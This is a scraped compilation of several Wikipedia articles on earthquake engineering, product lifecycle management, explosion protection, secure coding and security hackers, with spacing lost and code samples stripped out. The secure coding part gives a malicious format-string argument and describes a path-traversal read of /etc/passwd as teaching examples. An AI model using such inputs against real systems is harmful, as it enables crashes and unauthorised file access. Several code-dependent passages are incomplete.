effectiveness of both vertical and horizontal reinforcements depends on the type and quality of the masonry units andmortar. The devastating1933 Long Beach earthquakerevealed that masonry is prone to earthquake damage, which led to theCalifornia State Codemaking masonry reinforcement mandatory across California. Reinforced concreteis concrete in which steel reinforcement bars (rebars) orfibershave been incorporated to strengthen a material that would otherwise bebrittle. It can be used to producebeams,columns, floors or bridges. Prestressed concreteis a kind ofreinforced concreteused for overcoming concrete's natural weakness in tension. It can be applied tobeams, floors or bridges with a longer span than is practical with ordinary reinforced concrete. Prestressingtendons(generally of high tensile steel cable or rods) are used to provide a clamping load which produces acompressive stressthat offsets thetensile stressthat the concretecompression memberwould, otherwise, experience due to a bending load. To prevent catastrophic collapse in response earth shaking (in the interest of life safety), a traditional reinforced concrete frame should haveductilejoints. Depending upon the methods used and the imposed seismic forces, such buildings may be immediately usable, require extensive repair, or may have to be demolished. Prestressed structureis the one whose overallintegrity,stabilityandsecuritydepend, primarily, on aprestressing.Prestressingmeans the intentional creation of permanent stresses in a structure for the purpose of improving its performance under various service conditions.[58] There are the following basic types of prestressing: Today, the concept ofprestressed structureis widely engaged in design ofbuildings, underground structures, TV towers, power stations, floating storage and offshore facilities,nuclear reactorvessels, and numerous kinds ofbridgesystems.[59] A beneficial idea ofprestressingwas, apparently, familiar to the ancient Roman architects; look, e.g., at the tallatticwall ofColosseumworking as a stabilizing device for the wallpiersbeneath. Steel structuresare considered mostly earthquake resistant but some failures have occurred. A great number of weldedsteel moment-resisting framebuildings, which looked earthquake-proof, surprisingly experienced brittle behavior and were hazardously damaged in the1994 Northridge earthquake.[60]After that, theFederal Emergency Management Agency(FEMA) initiated development of repair techniques and new design approaches to minimize damage to steel moment frame buildings in future earthquakes.[61] Forstructural steelseismic design based onLoad and Resistance Factor Design(LRFD) approach, it is very important to assess ability of a structure to develop and maintain its bearing resistance in theinelasticrange. A measure of this ability isductility, which may be observed in amaterial itself, in astructural element, or to awhole structure. As a consequence ofNorthridge earthquakeexperience, the American Institute of Steel Construction has introduced AISC 358 "Pre-Qualified Connections for Special and intermediate Steel Moment Frames." The AISC Seismic Design Provisions require that allSteel Moment Resisting Framesemploy either connections contained in AISC 358, or the use of connections that have been subjected to pre-qualifying cyclic testing.[62] Earthquake loss estimationis usually defined as aDamage Ratio(DR) which is a ratio of the earthquake damage repair cost to thetotal valueof a building.[63]Probable Maximum Loss(PML) is a common term used for earthquake loss estimation, but it lacks a precise definition. In 1999, ASTM E2026 'Standard Guide for the Estimation of Building Damageability in Earthquakes' was produced in order to standardize the nomenclature for seismic loss estimation, as well as establish guidelines as to the review process and qualifications of the reviewer.[64] Earthquake loss estimations are also referred to asSeismic Risk Assessments. The risk assessment process generally involves determining the probability of various ground motions coupled with the vulnerability or damage of the building under those ground motions. The results are defined as a percent of building replacement value.[65]
https://en.wikipedia.org/wiki/Earthquake_engineering
Inindustry,product lifecycle management(PLM) is the process of managing the entire lifecycle of a product from its inception through theengineering,design, andmanufacture, as well as the service and disposal of manufactured products.[1][2]PLM integrates people, data, processes, andbusinesssystems and provides a product information backbone for companies and their extended enterprises.[3] The inspiration for the burgeoning business process now known as PLM came fromAmerican Motors Corporation(AMC).[4][5]The automaker was looking for a way to speed up its product development process to compete better against its larger competitors in 1985, according toFrançois Castaing, Vice President for Product Engineering and Development.[6]AMC focused its R&D efforts on extending the product lifecycle of its flagship products, particularly Jeeps, because it lacked the "massive budgets of General Motors, Ford, and foreign competitors."[7]After introducing its compactJeep Cherokee (XJ), the vehicle that launched the modernsport utility vehicle(SUV) market, AMC began development of a new model, that later came out as theJeep Grand Cherokee. The first part in its quest for faster product development wascomputer-aided design(CAD) software system that made engineers more productive.[6]The second part of this effort was the new communication system that allowed conflicts to be resolved faster, as well as reducing costlyengineering changesbecause all drawings and documents were in a central database.[6]The product data management was so effective that after Chrysler purchased AMC, the system was expanded throughout the enterprise connecting everyone involved in designing and building products.[6]While anearly adopterof PLM technology, Chrysler was able to become the auto industry's lowest-cost producer, recording development costs that were half of the industry average by the mid-1990s.[6] PLM systems help organizations cope with the increasing complexity and engineering challenges of developing new products for the global competitive markets.[8] Product lifecycle management (PLM) should be distinguished from 'product life-cycle management (marketing)' (PLCM). PLM describes a product's engineering aspect, from managing its descriptions and properties through its development and useful life. In contrast, PLCM refers to the commercial management of a product's life in the business market concerning costs and sales measures. Product lifecycle management can be considered one of the four cornerstones of a manufacturing corporation'sinformation technologystructure.[9]All companies need to manage communications and information with their customers (CRM-customer relationship management), their suppliers and fulfillment (SCM-supply chain management), their resources within the enterprise (ERP-enterprise resource planning) and their product planning and development (PLM). One form of PLM is called people-centric PLM. While traditional PLM tools have been deployed only on or during the release phase, people-centric PLM targets the design phase. As of 2009, ICT development (EU-funded PROMISE project 2004–2008) has allowed PLM to extend beyond traditional PLM and integrate sensor data and real-time 'lifecycle event data' into PLM, as well as allowing this information to be made available to different players in the total lifecycle of an individual product (closing the information loop). This broader reach has resulted in the extension of PLM intoclosed-loop lifecycle management(CL2M). Documented benefits of product lifecycle management include:[10][11] Within PLM there are five primary areas; Note: While application software is not required for PLM processes, the business complexity and rate of change requires organizations to execute as rapidly as possible. The core of PLM (product lifecycle management) is the creation and central management of all product data and the technology used to access this information and knowledge. PLM as a discipline emerged from tools such asCAD,CAMandPDM, but can be viewed as the integration of these tools with methods, people and the processes through all stages of a product's life.[12][13]It is not just about software technology but is also a business strategy.[14] For simplicity, the stages described are shown in a traditional sequential engineering workflow. The exact order of events and tasks will vary according to the product and industry in question but the main processes are:[15] The major key point events are: The reality is however more complex, people and departments cannot perform their tasks in isolation and one activity cannot simply finish, and the next activity start. Design is an iterative process, often designs need to be modified due to manufacturing constraints or conflicting requirements. Whether a customer order fits into the timeline depends on the industry type and whether the products are, for example, built to order, engineered to order, or assembled to order. Many software solutions have been developed to organize and integrate the different phases of a product's lifecycle. PLM should not be considered as a single software product, but as a collection of software tools and working methods integrated to address single stages of the lifecycle, connect different tasks, or manage the whole process. Some software providers cover the whole PLM range, while others have a single niche application. Some applications can span many fields of PLM with different modules within the same data model. An overview of the fields within PLM is covered here. The simple classifications do not always fit exactly; many areas overlap, and many software products cover more than one area or do not fit easily into one category. One of the main goals of PLM is to collect knowledge that can be reused for other projects and to coordinate the simultaneous concurrent development of many products. It is about business processes, people, and methods as much as software application solutions. Although PLM is mainly associated with engineering tasks, it also involvesmarketingactivities such asproduct portfolio management(PPM), particularly concerningnew product development(NPD). Each industry has several life-cycle models to consider, but most are relatively similar. Below is one possible life-cycle model; while it emphasizes hardware-oriented products, similar phases would describe any form of product or service, including non-technical or software-based products:[16] The first stage is the definition of the product requirements based on customer, company, market, and regulatory bodies' viewpoints. From this specification, the product's major technical parameters can be defined. In parallel, the initial concept design work is performed, defining the aesthetics of the product together with its main functional aspects. Many different media are used for these processes, from pencil and paper to clay models to 3D CAIDcomputer-aided industrial designsoftware. In some concepts, the investment of resources into research or analysis of options may be included in the conception phase – e.g., bringing the technology to a level of maturity sufficient to move to the next phase. However, life-cycle engineering is iterative. It is always possible that something does not work well in any phase enough to back up into a prior phase – perhaps back to conception or research. There are many examples to draw from. Thenew product developmentprocess phase collects and evaluates market and technical risks by measuring the KPI and scoring model. This step is where the detailed design and development of the product's form starts, progressing to prototype testing, from pilot release to full product launch. It can also involve redesign and ramping to improve existing products andplanned obsolescence.[17]CAD is the primary tool used for design and development. This can be simple 2D drawing/drafting or 3D parametric feature-based solid/surface modeling. Such software may include Hybrid Modeling,Reverse Engineering, KBE (knowledge-based engineering), NDT (Nondestructive testing), and Assembly construction. This step covers many engineering disciplines, including mechanical, electrical, electronic, software (embedded), and domain-specific, such as architectural, aerospace, and automotive. Along with creating geometry, the components and product assemblies are analyzed. Simulation, validation, and optimization tasks are carried out using CAE (computer-aided engineering) software, either integrated into the CAD package or stand-alone. These are used to perform tasks such as Stress analysis, FEA (finite element analysis),kinematics,computational fluid dynamics(CFD), and mechanical event simulation (MES). CAQ (computer-aided quality) is used for tasks such as Dimensionaltolerance (engineering)analysis. Another task performed at this stage is sourcing bought-out components, possibly with the aid ofprocurementsystems. Once the design of the product's components is complete, the method of manufacturing is defined. This includes CAD tasks such as tool design; including the creation ofCNCmachining instructions for the product's parts as well as the creation of specific tools to manufacture those parts, using integrated or separate CAM (computer-aided manufacturing) software. This will also involve analysis tools for process simulation of operations such as casting, molding, and die-press forming. Once the manufacturing method has been identified, CPM comes into play. This involves CAPE (computer-aided production engineering) or CAP/CAPP (computer-aidedproduction planning) tools for carrying out factory, plant and facility layout, and production simulation e.g. press-line simulation, industrial ergonomics, as well as tool selection management. After components are manufactured, their geometrical form and size can be checked against the original CAD data with the use of computer-aided inspection equipment and software. Parallel to the engineering tasks, sales product configuration, and marketing documentation work takes place. This could include transferring engineering data (geometry and part list data) to a web-based sales configurator and otherdesktop publishingsystems. Another phase of the lifecycle involves managing "in-service" information. This can include providing customers and service engineers with the support and information required forrepair and maintenance, as well aswaste managementorrecycling. This can involve the use of tools such as Maintenance, Repair, and Overhaul Management (MRO) software. An effective service consideration begins during and even prior to product design as an integral part of product lifecycle management. Service Lifecycle Management (SLM) has critical touchpoints at all phases of the product lifecycle that must be considered. Connecting and enriching a common digital thread will provide enhanced visibility across functions, improve data quality, and minimize costly delays and rework. There is anend-of-lifeto every product. Whether it be the disposal or destruction of material objects or information, this needs to be carefully considered since it may be legislated and hence not free from ramifications. During the operational phase, a product owner may discover components and consumables which have reached their individual end of life and for which there are Diminishing Manufacturing Sources or Material Shortages (DMSMS), or that the existing product can be enhanced for a wider or emerging user market easier or at less cost than a full redesign. This modernization approach often extends the product lifecycle and delays end-of-life disposal. None of the above phases should be considered as isolated. In reality, a project does not run sequentially or separated from other product development projects, with information flowing between different people and systems. A major part of PLM is the coordination and management of product definition data. This includes managing engineering changes and release status of components; configuration product variations; document management; planning project resources as well as timescale and risk assessment. For these tasks data of a graphical, textual, and meta nature – such as productbills of materials(BOMs) – needs to be managed. At the engineering departments level, this is the domain ofProduct Data Management(PDM) software, or at the corporate level Enterprise Data Management (EDM) software; such rigid level distinctions may not be consistently used, however, it is typical to see two or more data management systems within an organization. These systems may also be linked to other corporate systems such asSCM,CRM, andERP. Associated with these systems areproject managementsystems for project/program planning. This central role is covered by numerouscollaborative product developmenttools that run throughout the whole lifecycle and across organizations. This requires many technology tools in the areas of conferencing, data sharing, and data translation. This specialized field is referred to asproduct visualizationwhich includes technologies such as DMU (digital mock-up), immersive virtual digital prototyping (virtual reality), andphoto-realistic imaging. The broad array of solutions that make up the tools used within a PLM solution-set (e.g., CAD, CAM, CAx...) were initially used by dedicated practitioners who invested time and effort to gain the required skills. Designers and engineers produced excellent results with CAD systems, manufacturing engineers became highly skilled CAM users, while analysts, administrators, and managers fully mastered their support technologies. However, achieving the full advantages of PLM requires the participation of many people of various skills from throughout an extended enterprise, each requiring the ability to access and operate on the inputs and output of other participants. Despite the increased ease of use of PLM tools, cross-training all personnel on the entire PLM tool-set has not proven to be practical. Now, however, advances are being made to address ease of use for all participants within the PLM arena. One such advance is the availability of "role" specific user interfaces. Through tailorable user interfaces (UIs), the commands that are presented to users are appropriate to their function and expertise. These techniques include: Concurrent engineering(British English:simultaneous engineering) is a workflow that, instead of working sequentially through stages, carries out a number of tasks in parallel. For example: starting tool design as soon as the detailed design has started, and before the detailed designs of the product are finished; or starting on detailed design solid models before the concept design surfaces models are complete. Although this does not necessarily reduce the amount of manpower required for a project, as more changes are required due to incomplete and changing information, it does drastically reduce lead times and thus time to market.[18] Feature-based CAD systems have allowed simultaneous work on the 3D solid model and the 2D drawing by means of two separate files, with the drawing looking at the data in the model; when the model changes the drawing will associatively update. Some CAD packages also allow associative copying of geometry between files. This allows, for example, the copying of a part design into the files used by the tooling designer. The manufacturing engineer can then start work on tools before the final design freeze; when a design changes size or shape the tool geometry will then update. Concurrent engineering also has the added benefit of providing better and more immediate communication between departments, reducing the chance of costly, late design changes. It adopts a problem-prevention method as compared to the problem-solving and re-designing method of traditional sequential engineering. Bottom–up design (CAD-centric) occurs where the definition of 3D models of a product starts with the construction of individual components. These are then virtually brought together in sub-assemblies of more than one level until the full product is digitally defined. This is sometimes known as the "review structure" which shows what the product will look like. The BOM contains all of the physical (solid) components of a product from a CAD system; it may also (but not always) contain other 'bulk items' required for the final product but which (in spite of having definite physical mass and volume) are not usually associated with CAD geometry such as paint, glue, oil, adhesive tape, and other materials. Bottom–up design tends to focus on the capabilities of available real-world physical technology, implementing those solutions to which this technology is most suited. When these bottom–up solutions have real-world value, bottom–up design can be much more efficient than top–down design. The risk of bottom–up design is that it very efficiently provides solutions to low-value problems. The focus of bottom–up design is "what can we most efficiently do with this technology?" rather than the focus of top–down which is "What is the most valuable thing to do?" Top–down design is focused on high-level functional requirements, with relatively less focus on existing implementation technology. A top-level spec is repeatedly decomposed into lower-level structures and specifications until the physical implementation layer is reached. The risk of a top–down design is that it may not take advantage of more efficient applications of current physical technology, due to excessive layers of lower-level abstraction due to following an abstraction path that does not efficiently fit available components e.g. separately specifying sensing, processing, and wireless communications elements even though a suitable component that combines these may be available. The positive value of top–down design is that it preserves a focus on the optimum solution requirements. A part-centric top–down design may eliminate some of the risks of top–down design. This starts with a layout model, often a simple 2D sketch defining basic sizes and some major defining parameters, which may include someIndustrial designelements. Geometry from this is associatively copied down to the next level, which represents different subsystems of the product. The geometry in the sub-systems is then used to define more detail in the levels below. Depending on the complexity of the product, a number of levels of this assembly are created until the basic definition of components can be identified, such as position and principal dimensions. This information is then associatively copied to component files. In these files the components are detailed; this is where the classic bottom–up assembly starts. The top–down assembly is sometimes known as a "control structure". If a single file is used to define the layout and parameters for the review structure it is often known as a skeleton file. Defense engineering traditionally develops the product structure from the top down. The system engineering process[19]prescribes a functional decomposition of requirements and then the physical allocation of product structure to the functions. This top down approach would normally have lower levels of the product structure developed from CAD data as a bottom–up structure or design. Both-ends-against-the-middle (BEATM) design is a design process that endeavors to combine the best features of top–down design, and bottom–up design into one process. A BEATM design process flow may begin with an emergent technology that suggests solutions that may have value, or it may begin with a top–down view of an important problem that needs a solution. In either case, the key attribute of BEATM design methodology is to immediately focus on both ends of the design process flow: a top–down view of the solution requirements, and a bottom–up view of the available technology which may offer the promise of an efficient solution. The BEATM design process proceeds from both ends in search of an optimum merging somewhere between the top–down requirements, and bottom–up efficient implementation. In this fashion, BEATM has been shown to genuinely offer the best of both methodologies. Indeed, some of the best success stories from either top–down or bottom–up have been successful because of an intuitive, yet unconscious use of the BEATM methodology[citation needed]. When employed consciously, BEATM offers even more powerful advantages. Front loading is taking top–down design to the next stage. The complete control structure and review structure, as well as downstream data such as drawings, tooling development, and CAM models, are constructed before the product has been defined or a project kick-off has been authorized. These assemblies of files constitute a template from which a family of products can be constructed. When the decision has been made to go with a new product, the parameters of the product are entered into the template model, and all the associated data is updated. Obviously, predefined associative models will not be able to predict all possibilities and will require additional work. The main principle is that a lot of the experimental/investigative work has already been completed. A lot of knowledge is built into these templates to be reused on new products. This does require additional resources "up front" but can drastically reduce the time between project kick-off and launch. Such methods do however require organizational changes, as considerable engineering efforts are moved into "offline" development departments. It can be seen as an analogy to creating aconcept carto test new technology for future products, but in this case, the work is directly used for the next product generation. Individual components cannot be constructed in isolation.CADandCAIDmodels of components are created within the context of some or all of the other components within the product being developed. This is achieved usingassembly modellingtechniques. The geometry of other components can be seen and referenced within the CAD tool being used. The other referenced components may or may not have been created using the same CAD tool, with their geometry being translated from other collaborative product development (CPD) formats. Some assembly checking such asDMUis also carried out usingproduct visualizationsoftware. Product and process lifecycle management(PPLM)is an alternate genre of PLM in which the process by which the product is made is just as important as the product itself. Typically, this is the life sciences and advancedspecialty chemicalsmarkets. The process behind the manufacture of a given compound is a key element of the regulatory filing for a new drug application. As such, PPLM seeks to manage information around the development of the process in a similar fashion that baseline PLM talks about managing information around the development of the product. One variant of PPLM implementations areProcess Development Execution Systems(PDES). They typically implement the whole development cycle of high-tech manufacturing technology developments, from initial conception, through development, and into manufacture. PDES integrates people with different backgrounds from potentially different legal entities, data, information and knowledge, and business processes. After theGreat Recession, PLM investments from 2010 onwards showed a higher growth rate than most general IT spending.[20] Total spending on PLM software and services was estimated in 2020 to be $26 billion a year, with an estimated compound annual growth rate of 7.2% from 2021 to 2028.[21]This was expected to be driven by a demand for software solutions for management functions, such as change, cost, compliance, data, and governance management.[21] According to Malakooti (2013),[22]there are five long-term objectives that should be considered in production systems: The relation between these five objects can be presented as a pyramid with its tip associated with the lowest Cost, highest Productivity, highest Quality, most Flexibility, and greatest Sustainability. The points inside of this pyramid are associated with different combinations of five criteria. The tip of the pyramid represents an ideal (but likely highly unfeasible) system whereas the base of the pyramid represents the worst system possible.
https://en.wikipedia.org/wiki/Product_lifecycle_(engineering)#Phases_of_product_lifecycle_and_corresponding_technologies
Explosion protectionis used to protect all sorts of buildings and civil engineering infrastructure against internal and externalexplosionsordeflagrations. It was widely believed[1]until recently that a building subject to an explosive attack had a chance to remain standing only if it possessed some extraordinary resistive capacity. This belief rested on the assumption that the specific impulse or thetime integralof pressure, which is a dominant characteristic of the blast load, is fully beyond control. Avoidance makes it impossible for an explosion or deflagration to occur, for instance by means of suppressing the heat and the pressure needed for an explosion using an aluminum mesh structure such as eXess, by means of consistent displacement of the O2necessary for an explosion or deflagration to take place, by means ofpaddinggas (f. i. CO2or N2), or, by means of keeping the concentration of flammable content of an atmosphere consistently below or above theexplosive limit, or by means of consistent elimination of ignition sources. Constructional explosion protection aims at pre-defined, limited or zero damage that results from applied protective techniques in combination with reinforcement of the equipment or structures that must be expected to become subject to internal explosion pressure and flying debris or external violent impact.[2][3] The technology of protection[4]can range in price dramatically but where the type of device is rational to use, is typically from the least to the most expensive solution: explosion doors and vents (dependent on quantities and common denominators); inerting: explosion suppression; isolation – or combinations of same. To focus on the most cost effective, doors typically have lower release pressure capabilities; are not susceptible tofatiguefailures or subject to changing release pressures with changes in temperature, as "rupture membrane" types are; capable of leak tight service; service temperatures of up to 2,000 °F; and can be more cost effective in small quantities.Rupturemembrane type vents can provide a leak tight seal more readily in most cases; have a relatively broad tolerance on their release pressure and are more readily incorporated into systems with discharge ducts. There are several fundamental considerations in the review of a system handling potentially explosive dusts, gases or a mixture of the two. Dependent upon the design basis being used, often National Fire Protection Association Guideline 68, the definition of these may vary somewhat. To facilitate providing the reader with an appreciation of the issues rather than a design primer, the following have been limited to the major ones only. The database GESTIS-DUST-EX comprises important combustion and explosion characteristics of more than 7,000 dust samples from nearly all sectors of industry. It serves as a basis for the safe handling of combustible dusts and for the planning of preventive and protective measures against dust explosions in dust-generating and processing plants. The GESTIS-DUST-EX database is produced and maintained by theInstitute for Occupational Safety and Health of the German Social Accident Insurance. It was elaborated in co-operation with other institutions and companies. The database is available free of charge to be used foroccupational safety and healthpurposes.[5]
https://en.wikipedia.org/wiki/Explosion_protection
Secure codingis the practice of developing computersoftwarein such a way that guards against the accidental introduction ofsecurity vulnerabilities. Defects,bugsand logic flaws are consistently the primary cause of commonly exploited software vulnerabilities.[1]Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment.[2] Some scholars have suggested that in order to effectively confront threats related tocybersecurity, proper security should be coded or “baked in” to the systems. With security being designed into the software, this ensures that there will be protection against insider attacks and reduces the threat to application security.[3] Buffer overflows, a common software security vulnerability, happen when a process tries to store data beyond a fixed-length buffer. For example, if there are 8 slots to store items in, there will be a problem if there is an attempt to store 9 items. In computer memory the overflowed data may overwrite data in the next location which can result in a security vulnerability (stack smashing) or program termination (segmentation fault).[1] An example of aCprogram prone to a buffer overflow is If the user input is larger than the destination buffer, a buffer overflow will occur. To fix this unsafe program, use strncpy to prevent a possible buffer overflow. Another secure alternative is to dynamically allocate memory on the heap usingmalloc. In the above code snippet, the program attempts to copy the contents ofsrcintodst, while also checking the return value of malloc to ensure that enough memory was able to be allocated for the destination buffer. AFormat String Attackis when a malicious user supplies specific inputs that will eventually be entered as an argument to a function that performs formatting, such asprintf(). The attack involves the adversary reading from or writing to thestack. The C printf function writes output to stdout. If the parameter of the printf function is not properly formatted, several security bugs can be introduced. Below is a program that is vulnerable to a format string attack. A malicious argument passed to the program could be "%s%s%s%s%s%s%s", which can crash the program from improper memory reads. Integer overflowoccurs when an arithmetic operation results in an integer too large to be represented within the available space. A program which does not properly check for integer overflow introduces potential software bugs and exploits. Below is a function inC++which attempts to confirm that the sum of x and y is less than or equal to a defined value MAX: The problem with the code is it does not check for integer overflow on the addition operation. If the sum of x and y is greater than the maximum possible value of anunsigned int, the addition operation will overflow and perhaps result in a value less than or equal to MAX, even though the sum of x and y is greater than MAX. Below is a function which checks for overflow by confirming the sum is greater than or equal to both x and y. If the sum did overflow, the sum would be less than x or less than y. Path traversal is a vulnerability whereby paths provided from an untrusted source are interpreted in such a way that unauthorised file access is possible. For example, consider a script that fetches an article by taking a filename, which is then read by the script andparsed. Such a script might use the following hypothetical URL to retrieve an article aboutdog food: If the script has no input checking, instead trusting that the filename is always valid, amalicious usercould forge a URL to retrieve configuration files from the web server: Depending on the script, this may expose the/etc/passwdfile, which onUnix-likesystems contains (among others)user IDs, theirlogin names,home directorypaths andshells. (SeeSQL injectionfor a similar attack.)
https://en.wikipedia.org/wiki/Secure_coding
Asecurity hackeror security researcher is someone who explores methods for breaching defenses andexploitingweaknesses in acomputer systemornetwork.[1]Hackers may be motivated by a multitude of reasons, such as profit, protest, information gathering,[2]challenge, recreation,[3]or evaluation of a system weaknesses to assist in formulating defenses against potential hackers. Longstanding controversy surrounds the meaning of the term "hacker". In this controversy,computer programmersreclaim the termhacker, arguing that it refers simply to someone with an advanced understanding of computers and computer networks,[4]and thatcrackeris the more appropriate term for those who break into computers, whether computer criminals (black hats) or computer security experts (white hats).[5][6]A 2014 article noted that "the black-hat meaning still prevails among the general public".[7]The subculture that has evolved around hackers is often referred to as the "computer underground". The subculture around such hackers is termed network hacker subculture, hacker scene, or computer underground. It initially developed in the context ofphreakingduring the 1960s and the microcomputerBBS sceneof the 1980s. It is implicated with2600: The Hacker Quarterlyand thealt.2600newsgroup. In 1980, an article in the August issue ofPsychology Today(with commentary byPhilip Zimbardo) used the term "hacker" in its title: "The Hacker Papers." It was an excerpt from a Stanford Bulletin Board discussion on the addictive nature of computer use. In the 1982 filmTron, Kevin Flynn (Jeff Bridges) describes his intentions to break into ENCOM's computer system, saying "I've been doing a little hacking here." CLU is thesoftwarehe uses for this. By 1983, hacking in the sense of breaking computer security had already been in use as computer jargon,[8]but there was no public awareness about such activities.[9]However, the release of the filmWarGamesthat year, featuring a computer intrusion intoNORAD, raised the public belief that computer security hackers (especially teenagers) could be a threat to national security. This concern became real when, in the same year, a gang of teenage hackers inMilwaukee, Wisconsin, known asThe 414s, broke into computer systems throughout theUnited StatesandCanada, including those ofLos Alamos National Laboratory,Sloan-Kettering Cancer CenterandSecurity Pacific Bank.[10]The case quickly grew media attention,[10]and 17-year-old Neal Patrick emerged as the spokesman for the gang, including a cover story inNewsweekentitled "Beware: Hackers at play", with Patrick's photograph on the cover.[11]TheNewsweekarticle appears to be the first use of the wordhackerby the mainstream media in the pejorative sense. Pressured by media coverage, congressmanDan Glickmancalled for an investigation and began work on new laws against computer hacking.[12][13]Neal Patrick testified before theU.S. House of Representativeson September 26, 1983, about the dangers of computer hacking, and six bills concerning computer crime were introduced in the House that year.[13]As a result of these laws against computer criminality, white hat,grey hatand black hat hackers try to distinguish themselves from each other, depending on the legality of their activities. These moral conflicts are expressed inThe Mentor's "The Hacker Manifesto", published 1986 inPhrack. Use of the term hacker meaning computer criminal was also advanced by the title "Stalking the Wily Hacker", an article byClifford Stollin the May 1988 issue of theCommunications of the ACM. Later that year, the release byRobert Tappan Morris, Jr.of the so-calledMorris wormprovoked the popular media to spread this usage. The popularity of Stoll's bookThe Cuckoo's Egg, published one year later, further entrenched the term in the public's consciousness. In computer security, a hacker is someone who focuses on the security mechanisms of computer and network systems. Hackers can include someone who endeavors to strengthen security mechanisms by exploring their weaknesses and also those who seek to access secure, unauthorized information despite security measures. Nevertheless, parts of the subculture see their aim in correcting security problems and use the word in a positive sense. White hat is the name given to ethical computer hackers, who utilize hacking in a helpful way. White hats are becoming a necessary part of the information security field.[14]They operate under a code, which acknowledges that breaking into other people's computers is bad, but that discovering and exploiting security mechanisms and breaking into computers is still an interesting activity that can be done ethically and legally. Accordingly, the term bears strong connotations that are favorable or pejorative, depending on the context. Subgroups of the computer underground with different attitudes and motives use different terms to demarcate themselves from each other. These classifications are also used to exclude specific groups with whom they do not agree. Eric S. Raymond, author ofThe New Hacker's Dictionary, advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as a wider hacker culture, a view that Raymond has harshly rejected. Instead of a hacker/cracker dichotomy, they emphasize a spectrum of different categories, such aswhite hat,grey hat,black hatandscript kiddie. In contrast to Raymond, they usually reserve the termcrackerfor more malicious activity. According to Ralph D. Clifford, acrackerorcrackingis to "gain unauthorized access to a computer in order to commit another crime such as destroying information contained in that system."[15]These subgroups may also be defined by the legal status of their activities.[16] Awhite hat hackerbreaks security for non-malicious reasons, either to test their own security system, performpenetration testsorvulnerability assessmentsfor a client, or while working for a security company that makes security software. The term is generally synonymous withethical hacker, and certifications, courseware, classes, and online training covering the diverse arena of ethical hacking have been developed.[16] Ablack hat hackeris a hacker who "violates computer security for little reason beyond maliciousness or for personal gain" (Moore, 2005).[17]The term was coined byRichard Stallman, to contrast the maliciousness of a criminal hacker versus the spirit of playfulness and exploration inhacker culture, or the ethos of thewhite hat hackerwho performs hacking duties to identify places to repair or as a means of legitimate employment.[18]Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".[19] A grey hat hacker lies between a black hat and a white hat hacker, hacking for ideological reasons.[20]A grey hat hacker may surf the Internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example. They may then offer to correct the defect for a fee.[19]Grey hat hackers sometimes find the defect in a system and publish the facts to the world instead of a group of people. Even though grey hat hackers may not necessarily perform hacking for their personal gain, unauthorized access to a system can be considered illegal and unethical. Asocial statusamong hackers,eliteis used to describe the most skilled. Newly discoveredexploitscirculate among these hackers. Elitegroupssuch asMasters of Deceptionconferred a kind of credibility on their members.[21] Ascript kiddie(also known as askidorskiddie) is an unskilled hacker who breaks into computer systems by using automated tools written by others (usually by other black hat hackers), hence the term script (i.e. a computer script that automates the hacking) kiddie (i.e. kid, child an individual lacking knowledge and experience, immature),[22]usually with little understanding of the underlying concept. A neophyte ("newbie", or "noob") is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology and hacking.[19] Ablue hathacker is someone outside computer security consulting firms who is used to bug-test a system prior to its launch, looking for exploits so they can be closed.Microsoftalso uses the termBlueHatto represent a series of security briefing events.[23][24][25] A hacktivist is a hacker who utilizes technology to publicize a social, ideological, religious or political message. Hacktivismcan be divided into two main groups: Intelligence agencies andcyberwarfareoperatives of nation states.[26] Groups of hackers that carry out organized criminal activities for profit.[26]Modern-daycomputer hackershave been compared to theprivateersof by-gone days.[27]These criminals hold computer systems hostage, demanding large payments from victims to restore access to their own computer systems and data.[28]Furthermore, recentransomwareattacks on industries, including energy, food, and transportation, have been blamed oncriminal organizationsbased in or near astate actor– possibly with the country's knowledge and approval.[29]Cyber theftand ransomware attacks are now the fastest-growing crimes in the United States.[30]Bitcoinand othercryptocurrenciesfacilitate theextortionof huge ransoms from large companies, hospitals and city governments with little or no chance of being caught.[31] Hackers can usually be sorted into two types of attacks: mass attacks and targeted attacks.[32]They are sorted into the groups in terms of how they choose their victims and how they act on the attacks.[32] A typical approach in an attack on Internet-connected system is: In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts. A security exploit is a prepared application that takes advantage of a known weakness.[34]Common examples of security exploits areSQL injection,cross-site scriptingandcross-site request forgerywhich abuse security holes that may result from substandard programming practice. Other exploits would be able to be used throughFile Transfer Protocol(FTP),Hypertext Transfer Protocol(HTTP),PHP,SSH,Telnetand some Web pages. These are very common in Web site and Web domain hacking. Tools and Procedures The computer underground[3]has produced its own specialized slang, such as1337speak. Writing software and performing other activities to support these views is referred to ashacktivism. Some consider illegal cracking ethically justified for these goals; a common form iswebsite defacement. The computer underground is frequently compared to the Wild West.[48]It is common for hackers to use aliases to conceal their identities. The computer underground is supported by regular real-world gatherings calledhacker conventionsor "hacker cons". These events includeSummerCon(Summer),DEF CON,HoHoCon(Christmas),ShmooCon(February),Black Hat Conference,Chaos Communication Congress, AthCon, Hacker Halted, andH.O.P.E.[citation needed]Local Hackfest groups organize and compete to develop their skills to send a team to a prominent convention to compete in group pentesting, exploit and forensics on a larger scale. Hacker groups became popular in the early 1980s, providing access to hacking information and resources and a place to learn from other members. Computerbulletin board systems(BBSs), such as the Utopias, provided platforms for information-sharing via dial-up modem. Hackers could also gain credibility by being affiliated with elite groups.[49] Maximum imprisonment is one year or a fine of the fourth category.[50] 18 U.S.C.§ 1030, more commonly known as theComputer Fraud and Abuse Act, prohibits unauthorized access or damage of "protected computers". "Protected computers" are defined in18 U.S.C.§ 1030(e)(2)as: The maximum imprisonment or fine for violations of theComputer Fraud and Abuse Actdepends on the severity of the violation and the offender's history of violations under theAct. TheFBIhas demonstrated its ability to recover ransoms paid incryptocurrencyby victims of cybertheft.[51] The most notable hacker-oriented print publications arePhrack,Hakin9and2600: The Hacker Quarterly. While the information contained in hacker magazines andezineswas often outdated by the time they were published, they enhanced their contributors' reputations by documenting their successes.[49] Hackers often show an interest in fictionalcyberpunkandcybercultureliterature and movies. The adoption offictionalpseudonyms,[52]symbols, values 